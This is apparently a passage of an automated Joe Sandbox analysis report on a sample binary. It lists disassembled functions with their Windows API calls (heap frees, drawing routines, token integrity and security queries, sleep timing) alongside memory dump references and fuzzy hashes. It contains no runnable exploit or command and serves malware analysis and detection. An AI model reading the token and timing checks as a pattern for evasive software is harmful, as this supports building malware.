                                                                                • Instruction ID: 053bf697926f3b7c142dd0d4f8f9d98aa9fffb1f9d04bf92db2b44d00d88c690
                                                                                • Opcode Fuzzy Hash: 0ea1e90ebf6bfabf14000e2989313fc823f9c234ce65668d6d027ac3337dd96a
                                                                                • Instruction Fuzzy Hash: 4A218135600604AFE714EF69D888AAEBBE6FF45711F04806DE84AD7352DB70EC44CB90
                                                                                Function 0060CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0060CDC6
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0060CDE9
                                                                                  • Part of subcall function 00603820: RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0060CE0F
                                                                                • _free.LIBCMT ref: 0060CE22
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0060CE31
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: db226ce47d7fc03b66bbb47f0fcf4bb15832a23d76bdebedafc0e6c4c50fb1a0
                                                                                • Instruction ID: 268e94e048c69eb7e2ec69ea1f04439176a57648288cbc8a3ab56c24bb3a0ae1
                                                                                • Opcode Fuzzy Hash: db226ce47d7fc03b66bbb47f0fcf4bb15832a23d76bdebedafc0e6c4c50fb1a0
                                                                                • Instruction Fuzzy Hash: 9301B5726416157FE32517BAAC4CC7B696FDFC6BB13150229FD05D6380DA608D0191B0
                                                                                Function 005E9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005E9693
                                                                                • SelectObject.GDI32(?,00000000), ref: 005E96A2
                                                                                • BeginPath.GDI32(?), ref: 005E96B9
                                                                                • SelectObject.GDI32(?,00000000), ref: 005E96E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: 016577b0f7bd5894375485bb8d991d0a29af9a7679d6fdbc1e557770c9dd6dfc
                                                                                • Instruction ID: 1bdea61754c26b336252c0f7bbaf1abd3de955b35def1a8866a74805586bf55f
                                                                                • Opcode Fuzzy Hash: 016577b0f7bd5894375485bb8d991d0a29af9a7679d6fdbc1e557770c9dd6dfc
                                                                                • Instruction Fuzzy Hash: AC218330801385EBDB11AF65EC147EA7F66BB43365F101217F4909A1B0D3706991CF94
                                                                                Function 00635711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _memcmp
                                                                                • String ID:
                                                                                • API String ID: 2931989736-0
                                                                                • Opcode ID: d0d5bbb334e59dc7abe243707262d3588bc3195510bf557b01ea5506973c2b8f
                                                                                • Instruction ID: c27a76d7ae4e15d1a942633398af53d925dc6fc57f477dd7e2876830e8e73b19
                                                                                • Opcode Fuzzy Hash: d0d5bbb334e59dc7abe243707262d3588bc3195510bf557b01ea5506973c2b8f
                                                                                • Instruction Fuzzy Hash: CE01B561645A0AFBD2085610AD82FFB736FAB71394F414420FE069B281F764ED11C2E5
                                                                                Function 00602DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,?,005FF2DE,00603863,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6), ref: 00602DFD
                                                                                • _free.LIBCMT ref: 00602E32
                                                                                • _free.LIBCMT ref: 00602E59
                                                                                • SetLastError.KERNEL32(00000000,005D1129), ref: 00602E66
                                                                                • SetLastError.KERNEL32(00000000,005D1129), ref: 00602E6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: 1596afe3c7c25deafbfadf1dcd7c6b78ca1f47bcf8742ee083584efdfb0e0112
                                                                                • Instruction ID: 5a3bf441b151e3b4b303bc2d7322360b02ffb5ad8ae4d37e43130a6c8aa6deef
                                                                                • Opcode Fuzzy Hash: 1596afe3c7c25deafbfadf1dcd7c6b78ca1f47bcf8742ee083584efdfb0e0112
                                                                                • Instruction Fuzzy Hash: D301F4362C5A0267C71A3735ACADD6B265FAFD17B5B21042DF965A23E2EF608C014124
                                                                                Function 0063000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?,?,0063035E), ref: 0063002B
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630046
                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630054
                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?), ref: 00630064
                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630070
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: 23aafc679a53d053e0da4cf3d34f2820e3119b44c3ee03562a5ece636140a71f
                                                                                • Instruction ID: c9d602c31deaa4cd0437d9bf09a819b06e661b626f8497759a9441fbd566ff24
                                                                                • Opcode Fuzzy Hash: 23aafc679a53d053e0da4cf3d34f2820e3119b44c3ee03562a5ece636140a71f
                                                                                • Instruction Fuzzy Hash: 61018B72600618BFEB245F68DC44BAA7EAFEB447A2F149128F945D3210E7B5DD448BE0
                                                                                Function 0063E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0063E997
                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0063E9A5
                                                                                • Sleep.KERNEL32(00000000), ref: 0063E9AD
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0063E9B7
                                                                                • Sleep.KERNEL32 ref: 0063E9F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: 6e75462a1994288ef64d39899b8e1f040beff9492093b5bf5c2385d972c5a4d7
                                                                                • Instruction ID: d4de55aeab07ec2d2811854dd5331b6df8f042268eb14a5e92a2559792e6849f
                                                                                • Opcode Fuzzy Hash: 6e75462a1994288ef64d39899b8e1f040beff9492093b5bf5c2385d972c5a4d7
                                                                                • Instruction Fuzzy Hash: B0015B31C01929DBCF00ABE4DC596EDBBBABB09311F000546E542B2280CB75965287A1
                                                                                Function 006310F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00631114
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631120
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 0063112F
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631136
                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0063114D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 842720411-0
                                                                                • Opcode ID: 9bc3778b834324713a5e95101fe0410792e656c6d9ae0c057eeb6b05503bbd79
                                                                                • Instruction ID: a1ceec18a0659ac9dbae80482ab0b5a4fff31aa154ba769b6e71ef00b43bf378
                                                                                • Opcode Fuzzy Hash: 9bc3778b834324713a5e95101fe0410792e656c6d9ae0c057eeb6b05503bbd79
                                                                                • Instruction Fuzzy Hash: 00011975200605BFDB114FA5DC49AAA3F6FEF8A3A0B204419FA85D7360DA72DC009AA0
                                                                                Function 00630FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00630FCA
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00630FD6
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00630FE5
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00630FEC
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00631002
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 2b559ef4c45ecba9f5bd50009bfcb987e52ae4c000f85ad7ba89d3d6aee9bd78
                                                                                • Instruction ID: 7e608253892b8b9ef80b627d3e4eeeb99541316b78a185a5035e1c7329ade96b
                                                                                • Opcode Fuzzy Hash: 2b559ef4c45ecba9f5bd50009bfcb987e52ae4c000f85ad7ba89d3d6aee9bd78
                                                                                • Instruction Fuzzy Hash: 7DF04F35100701BBD7214FA5DC49FA63B6EEF8A761F105414F985DA251CAB1DC408A60
                                                                                Function 00631014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0063102A
                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00631036
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00631045
                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0063104C
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00631062
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: b647df0c4f572436bae5949653be69c4fbcc75a3bf0bccd63a07782b3b202ff5
                                                                                • Instruction ID: dddd22675b1bd879d20e333ee0a9c3319aeca6e3305c7581c6c915a98a4a6c88
                                                                                • Opcode Fuzzy Hash: b647df0c4f572436bae5949653be69c4fbcc75a3bf0bccd63a07782b3b202ff5
                                                                                • Instruction Fuzzy Hash: D8F04F35200705BBD7215FA5EC59FA63B6EEF8A761F101414F985DA250CAB1D8808A60
                                                                                Function 0064030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 00640324
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 00640331
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 0064033E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 0064034B
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 00640358
                                                                                • CloseHandle.KERNEL32(?,?,?,?,0064017D,?,006432FC,?,00000001,00612592,?), ref: 00640365
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 59bef1dddc637853fd2abfbaea283881a32b4d93fc45100a70713a5154292ff8
                                                                                • Instruction ID: 49dc10c82273be8be8e7356d83af3ee1148b72e9f2b88e09040ee61f1d4f6dfa
                                                                                • Opcode Fuzzy Hash: 59bef1dddc637853fd2abfbaea283881a32b4d93fc45100a70713a5154292ff8
                                                                                • Instruction Fuzzy Hash: DB01A276800B269FD7319F66D890452FBF6BF503153158A3FD29652A31C3B1A954CF80
                                                                                Function 0060D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0060D752
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 0060D764
                                                                                • _free.LIBCMT ref: 0060D776
                                                                                • _free.LIBCMT ref: 0060D788
                                                                                • _free.LIBCMT ref: 0060D79A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 2a2a11a5f2f9827429a4c1f35d8194e5c1155f73d939b9617729bc6a1ec1f4b4
                                                                                • Instruction ID: 05ab167edcf3497fc886b38034afa4059867717ec6e29bebfd27b37465990094
                                                                                • Opcode Fuzzy Hash: 2a2a11a5f2f9827429a4c1f35d8194e5c1155f73d939b9617729bc6a1ec1f4b4
                                                                                • Instruction Fuzzy Hash: B9F0FF32584205ABC669EBA9F9D5C5B7BDFBF447207A41D0AF048E7A81C720FC8086A4
                                                                                Function 00635C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00635C58
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00635C6F
                                                                                • MessageBeep.USER32(00000000), ref: 00635C87
                                                                                • KillTimer.USER32(?,0000040A), ref: 00635CA3
                                                                                • EndDialog.USER32(?,00000001), ref: 00635CBD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 7b6e41a8e7fd6b97227d848f1a5c12021d0948b4e7c0f9c7dbd90cff4b2e39ff
                                                                                • Instruction ID: 95d3e755d365576dfc50604e9937251157e9b8e1a81d8373352930f09ffb6f9d
                                                                                • Opcode Fuzzy Hash: 7b6e41a8e7fd6b97227d848f1a5c12021d0948b4e7c0f9c7dbd90cff4b2e39ff
                                                                                • Instruction Fuzzy Hash: 0A018630500B04ABEB205B14DD4EFE67BBABB00B05F04255EE583A25E1DBF4A985CA95
                                                                                Function 006022A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 006022BE
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 006022D0
                                                                                • _free.LIBCMT ref: 006022E3
                                                                                • _free.LIBCMT ref: 006022F4
                                                                                • _free.LIBCMT ref: 00602305
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 5cb6df4e494ee653b26aeb48f7dca00c07ba00b8137d955c845033c299fab7ec
                                                                                • Instruction ID: a85780b849411a168e9204d63e1f53a4b9656e4efb63f4ac64eefae43dbf628e
                                                                                • Opcode Fuzzy Hash: 5cb6df4e494ee653b26aeb48f7dca00c07ba00b8137d955c845033c299fab7ec
                                                                                • Instruction Fuzzy Hash: AAF030744901118FCB56BF65BC1595A3F6BBF1BB60B50290BF410D72F1C7306A519FA8
                                                                                Function 005E95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 005E95D4
                                                                                • StrokeAndFillPath.GDI32(?,?,006271F7,00000000,?,?,?), ref: 005E95F0
                                                                                • SelectObject.GDI32(?,00000000), ref: 005E9603
                                                                                • DeleteObject.GDI32 ref: 005E9616
                                                                                • StrokePath.GDI32(?), ref: 005E9631
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                • Opcode ID: 3725ac777fc06b0552b2f9d4c42c935fc4103861c7d716434e0f0ef6839fa5cb
                                                                                • Instruction ID: 03df4aacfc50f14486d9076dcaa75d034fbfb4c981e2bb3111b73457793e2496
                                                                                • Opcode Fuzzy Hash: 3725ac777fc06b0552b2f9d4c42c935fc4103861c7d716434e0f0ef6839fa5cb
